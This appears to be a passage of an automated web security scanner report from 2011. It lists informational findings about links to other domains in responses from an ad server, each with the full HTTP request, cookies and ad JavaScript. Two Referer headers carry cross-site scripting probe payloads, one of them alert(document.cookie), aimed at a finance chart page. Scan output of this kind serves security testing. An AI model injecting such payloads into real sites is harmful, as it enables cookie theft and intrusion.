function getRADIds() { return{"adid":"26000000000153628","pid":"8008908","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_840958461() {var adCode_840958461=new Array();adCode_840958461.push('<iframe src="http://view.atdmt.com/BEL/iview/msnnksbu0010000337bel/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_840958461.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_840958461.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/msnnksbu0010000337bel/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/msnnksbu0010000337bel/direct;/01/"/></a>
...[SNIP]...

22.274. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetAd?PG= HTTP/1.1
Host: rad.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC01=FB=; FC02=FB=; CULTURE=EN-US; FC00=FB=AgEAVQ5AiKgB; Sample=63; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; FC07=FB=; FC08=FB=; FC09=FB=; FC03=FB=; FC04=FB=; FC05=FB=; CC=US; FC06=FB=; MUID=AD04D6F8B2FF44629973BD0674351135; mh=MSFT; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 89
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:50:29 GMT

<!--NOAD--><img src="http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C18&R="/>

22.275. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1296
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:10 GMT
Content-Length: 1296


//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.redacted/0AD00001/1686997.1?!&amp;&amp;PID=8282372&amp;UIT=G&amp;TargetID=30580561&amp;AN=708002109&amp;PG=INVXTA">$7 Online S
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

22.276. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNIF1&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 912
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8329208-T21144173-C37000000000038948
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 912


//<![CDATA[
function getRADIds() { return{"adid":"37000000000038948","pid":"8329208","targetid":"21144173"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/37000000000038948.1??PID=8329208&amp;UIT=G&amp;TargetID=21144173&amp;AN=1362758608&amp;PG=MSNIF1&amp;ASID=78bcba5895c24a899102dde9ee9822ff" target="_blank"><img src="http://ads2.msads.net/CIS/1/000/000/000/012/624.gif" width="300" height="60" alt="Click Here!" border="0" /></a>');document.write('<img src="http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608?" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.277. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 964
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C83000000000035182
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:49:13 GMT
Content-Length: 964


//<![CDATA[
function getRADIds() { return{"adid":"83000000000035182","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/83000000000035182.1??PID=8009935&amp;UIT=G&amp;TargetID=22841720&amp;AN=1360528144&amp;PG=MSNHQ2&amp;ASID=142ec5c109f54f0eb2f0dc40b42b6fa6" target="_blank"><img src="http://ads2.msads.net/CIS/110/000/000/000/005/545.jpg" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1360528144" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.278. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2577
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC09=FB=AgEAYQ7hzAgC; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8322236-T38343719-C95000000000042282
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 15:14:04 GMT
Content-Length: 2577


//<![CDATA[
function getRADIds() { return{"adid":"95000000000042282","pid":"8322236","targetid":"38343719"};} document.write('<scr'+'ipt type="text/javascript" src="'+encodeURI('http://b.scorecardre
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1476414172() {var adCode_1476414172=new Array();adCode_1476414172.push('<iframe src="http://view.atdmt.com/MEX/iview/289781498/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_1476414172.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1476414172.push('document.write(\'<a href="http://clk.atdmt.com/MEX/go/289781498/direct;/01/" target="_blank"><img src="http://view.atdmt.com/MEX/view/289781498/direct;/01/"/></a>
...[SNIP]...

22.279. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1298
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:20 GMT
Content-Length: 1298


//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.redacted/0AD00001/1686997.1?!&amp;&amp;PID=8282372&amp;UIT=G&amp;TargetID=30580561&amp;AN=1628572308&amp;PG=INVXTA">$7 Online
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

22.280. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVXTA&AP=1440 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1294
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Content-Length: 1294


//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.redacted/0AD00001/1686997.1?!&amp;&amp;PID=8282372&amp;UIT=G&amp;TargetID=30580561&amp;AN=36374631&amp;PG=INVXTA">$7 Online St
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

22.281. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC1&AP=1455 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 753
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8050733-T28253484-C86000000000035080
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Content-Length: 753


//<![CDATA[
function getRADIds() { return{"adid":"86000000000035080","pid":"8050733","targetid":"28253484"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003K/86000000000035080.1??PID=8050733&amp;UIT=G&amp;TargetID=28253484&amp;AN=17826006&amp;PG=INVPC1&amp;ASID=b016826118104afe9d978aff16ac4855" target="_blank"><img src="http://ads2.msads.net/CIS/15/000/000/000/011/774.gif" width="300" height="60" alt="click here" border="0" /></a>
...[SNIP]...

22.282. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSB&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2773
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8000152-T26475342-C86000000000035072
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:55:11 GMT
Content-Length: 2773


//<![CDATA[
function getRADIds() { return{"adid":"86000000000035072","pid":"8000152","targetid":"26475342"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2016493885() {var adCode_2016493885=new Array();adCode_2016493885.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&amp;&amp;PID=8000152&amp;UIT=G&amp;TargetID=26475342&amp;AN=2016493885&amp;PG=NBCMSB&amp;ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2016493885.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4441.microsoftonline/B5073082;abr=!ie;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.ms
...[SNIP]...

22.283. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2792
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8058174-T36872389-C52000000000037696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:49:46 GMT
Content-Length: 2792


//<![CDATA[
function getRADIds() { return{"adid":"52000000000037696","pid":"8058174","targetid":"36872389"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_993675565() {var adCode_993675565=new Array();adCode_993675565.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&amp;&amp;PID=8058174&amp;UIT=G&amp;TargetID=36872389&amp;AN=993675565&amp;PG=NBCMSN&amp;ASID=bc6615db9ae7439c9d4b6bb2172c275a&destination=;ord=993675565?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_993675565.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=ht
...[SNIP]...

22.284. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2809
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8058174-T36872389-C52000000000037696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:19:42 GMT
Content-Length: 2809


//<![CDATA[
function getRADIds() { return{"adid":"52000000000037696","pid":"8058174","targetid":"36872389"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1895959499() {var adCode_1895959499=new Array();adCode_1895959499.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&amp;&amp;PID=8058174&amp;UIT=G&amp;TargetID=36872389&amp;AN=1895959499&amp;PG=NBCMSN&amp;ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1895959499.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=h
...[SNIP]...

22.285. http://realestate.redacted/OmRedir.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /OmRedir.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /OmRedir.aspx?urlTok=10&cat=NewHomes&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
